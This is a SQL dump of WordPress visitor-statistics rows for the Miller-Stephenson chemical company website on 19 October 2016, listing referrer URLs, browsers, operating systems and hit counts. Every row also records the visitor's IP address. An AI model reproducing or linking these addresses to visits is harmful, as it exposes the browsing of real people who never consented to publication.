INSERT INTO `wp_statistics_visitor` VALUES (6335, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/', 'MSIE', 'Windows', '11.0', '', '192.104.67.121', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6336, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6337, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiB-5KTj-fPAhUCwiYKHTbpDdYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,bs.1,d.eWE', 'MSIE', 'Windows', '11.0', '', '131.92.144.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6338, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '204.28.31.3', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6339, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.220.236.34', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6340, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.112', '', '213.189.136.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6341, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.250.6.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6342, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.61.35.115', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6343, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.231.82.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6344, '2016-10-19', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.23', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6345, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwj99Niik-fPAhXJIpoKHbMkAXgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.bGs', 'MSIE', 'Windows', '11.0', '', '192.104.67.221', '000', 37, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6346, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6347, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'iPhone', '53.0.2785.109', '', '75.84.178.30', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6348, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.60.197.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6349, '2016-10-19', 'https://www.bing.com/search?q=MILLER%20STEPHENSON%20CHEMICAL%20CO.%20ACRYLIC%20COATING%20%20MS-465C&qs=n&form=QBRE&pq=miller%20stephenson%20chemical%20co.%20acry&sc=0-35&sp=-1&sk=&cvid=345F13F944D249DDA7AFB340D2FE0250', 'MSIE', 'Windows', '11.0', '', '192.104.67.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6350, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.222', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6351, '2016-10-19', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.183.199.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6352, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiMlbWLlufPAhUPa34KHZiTDtoYABAA&sig=AOD64_0yw7JycWmLTvxrWegJ766JKWLCTg&rct=j&q=&ved=0ahUKEwjaoLKLlufPAhUHqVQKHTddAPUQ0QwIHw&adurl=', 'MSIE', 'Windows', '11.0', '', '73.66.61.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6353, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '96.83.147.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6354, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '96.83.147.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6355, '2016-10-19', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6356, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.77.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6357, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.46.250.144', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6358, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '167.115.115.3', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6359, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.100.1.98', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6360, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.96.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6361, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6362, '2016-10-19', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwiUrrPpmufPAhVMpx4KHcGTCioQFggkMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fcontact%2F&usg=AFQjCNE8T3eWNAa7jFCvKjHO-SI6GhqPtQ&bvm=bv.135974163,d.dmo', 'MSIE', 'Windows', '10.0', '', '207.219.230.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6363, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '68.71.164.110', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6364, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6365, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.110.43.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6366, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '89.110.58.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6367, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6368, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6369, '2016-10-19', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/connector-lubricants/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.104.48.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6370, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.141.245.44', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6371, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.73.70.214', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6372, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '69.21.160.199', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6373, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '165.214.12.76', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6374, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '158.181.162.124', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6375, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.93.212.30', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6376, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjMyYDCo-fPAhVC7yYKHbYPAwcQFggxMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fdry-film-ptfe-release-agent%2F&usg=AFQjCNGpwNBIBwX4PVWyGmdtXsBx9xJKjw&sig2=XMCVlTr4r-q_SnUn340DZw', 'MSIE', 'Windows', '11.0', '', '144.9.40.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6377, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.235.51.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6378, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6379, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.64.70.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6380, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.179.16.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6381, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '45.55.133.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6382, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.105.177.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6383, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.9.126.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6384, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.208.145.116', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6385, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '65.216.171.130', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6386, '2016-10-19', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjN7v3WqOfPAhWMHoYKHSa1CXcYABAH&sig=AOD64_3a2yTDLrVGCxLPiYW2yOealTBBqQ&rct=j&q=&ved=0ahUKEwjN_vnWqOfPAhWKaT4KHXNKA6oQ0QwIbw&adurl=', 'MSIE', 'Windows', '11.0', '', '70.26.104.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6387, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.251.68.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6388, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.131.37.18', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6389, '2016-10-19', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.95', '', '23.250.40.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6390, '2016-10-19', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.250.40.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6391, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.30.213.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6392, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '192.149.230.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6393, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '2.87.12.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6394, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.203.18.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6395, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '50.254.133.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6396, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.11', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6397, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6398, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjOk7W7refPAhUDNz4KHQs6AnwQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '107.1.77.17', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6399, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.237.150.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6400, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '71.238.127.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6401, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Macintosh', '49.0', '', '198.147.175.203', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6402, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.28.143.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6403, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjOpLubr-fPAhUID2kKHfIjBkQYABAA&ei=HKoHWM-XD6rRjwTL74Yo&sig=AOD64_0XZKJkankNJd1jzzhhGxftJAHDvQ&rct=j&q=&sqi=2&ved=0ahUKEwjPlbabr-fPAhWq6IMKHcu3AQUQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '216.110.87.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6404, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwio5enmr-fPAhVG4CYKHZJ_AIsQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.eWE', 'MSIE', 'Windows', '11.0', '', '71.8.37.122', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6405, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.9.226.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6406, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.117.90.118', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6407, '2016-10-19', 'https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwiVuZa3sOfPAhVqCsAKHScyBYkQFgglMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fdry-film-ptfe-release-agent%2F&usg=AFQjCNGpwNBIBwX4PVWyGmdtXsBx9xJKjw&bvm=bv.135974163,d.bGg', 'MSIE', 'Windows', '11.0', '', '89.68.92.4', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6408, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.41.60.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6409, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.45.193.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6410, '2016-10-19', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.125.233.42', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6411, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiu8eb-sOfPAhXGW4YKHS07COMYABAA&sig=AOD64_15Lc1kYH8krKV8ihyL154es-jvig&rct=j&q=&ved=0ahUKEwjd19_-sOfPAhUCeCYKHdcwCEkQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '12.230.14.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6412, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.207.127.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6413, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '184.57.181.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6414, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '134.249.159.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6415, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '12.226.201.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6416, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.85.59.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6417, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '172.58.22.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6418, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '131.89.129.236', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6419, '2016-10-19', 'https://forums.vwvortex.com/showthread.php?3087297-How-to-solve-(or-prevent)-Eos-Roof-leaks/page12', 'MSIE', 'Windows', '11.0', '', '192.168.16.195', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6420, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '142.196.81.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6421, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.166.76.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6422, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.250.225.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6423, '2016-10-19', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.86.189.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6424, '2016-10-19', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjniMzhtOfPAhVTWoYKHRy2CcEYABAA&sig=AOD64_3IvxQavYJPvEizBOOUyLdx1Df7OQ&rct=j&q=&ved=0ahUKEwijssfhtOfPAhXJJiYKHbDaAFQQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '75.144.218.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6425, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.69.22.76', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6426, '2016-10-19', 'https://www.bing.com/search?q=miller+stephenson+chemical&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '35.9.42.237', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6427, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.233.117.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6428, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.131', '', '23.81.241.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6429, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.93.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6430, '2016-10-19', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6431, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.229.86.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6432, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6433, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '5.116.114.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6434, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.43.8.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6435, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&cad=rja&uact=8&ved=0ahUKEwjPpJOuuefPAhXG5SYKHSLHDNgQFggvMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-834%2F&usg=AFQjCNF9-iQ0fyqrEnrYYj3rF0AgHmS5Dg&bvm=bv.135974163,bs.1,d.cWw', 'MSIE', 'Windows', '11.0', '', '151.207.250.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6436, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.180.145.12', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6437, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.84.169.84', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6438, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.69.7.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6439, '2016-10-19', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '6.0', '', '173.208.249.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6440, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '44.0.2403.133', '', '77.216.231.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6441, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.138.107.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6442, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '84.248.85.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6443, '2016-10-19', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.46.249.173', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6444, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.94.112.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6445, '2016-10-19', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '162.17.116.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6446, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6447, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0ahUKEwih-PfEvufPAhVn6YMKHVc6B88QFggwMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNHUfibmnSo5DfkuTd-5Mx9sov-a1Q&bvm=bv.135974163,d.amc', 'MSIE', 'Windows', '10.0', '', '69.11.216.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6448, '2016-10-19', 'https://www.google.com/search', 'Chrome', 'Linux', '27.0.1453', '', '24.63.154.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6449, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.33.240.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6450, '2016-10-19', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6451, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.189.28.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6452, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.41.70.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6453, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.105.216.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6454, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.3.131.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6455, '2016-10-19', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '173.75.1.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6456, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6457, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '73.206.97.189', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6458, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '198.177.184.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6459, '2016-10-19', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6460, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.151.29.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6461, '2016-10-19', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '108.224.165.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6462, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '156.1.40.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6463, '2016-10-19', 'https://www.google.ca/', 'Safari', 'iPad', '10.0', '', '142.176.81.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6464, '2016-10-19', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwi2y4yYyOfPAhXPuB4KHetiDoMQjBAIJDAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w', 'MSIE', 'Windows', '11.0', '', '167.115.115.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6465, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.235.53.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6466, '2016-10-19', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '129.171.6.36', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6467, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '129.171.6.38', '000', 2, 0); 
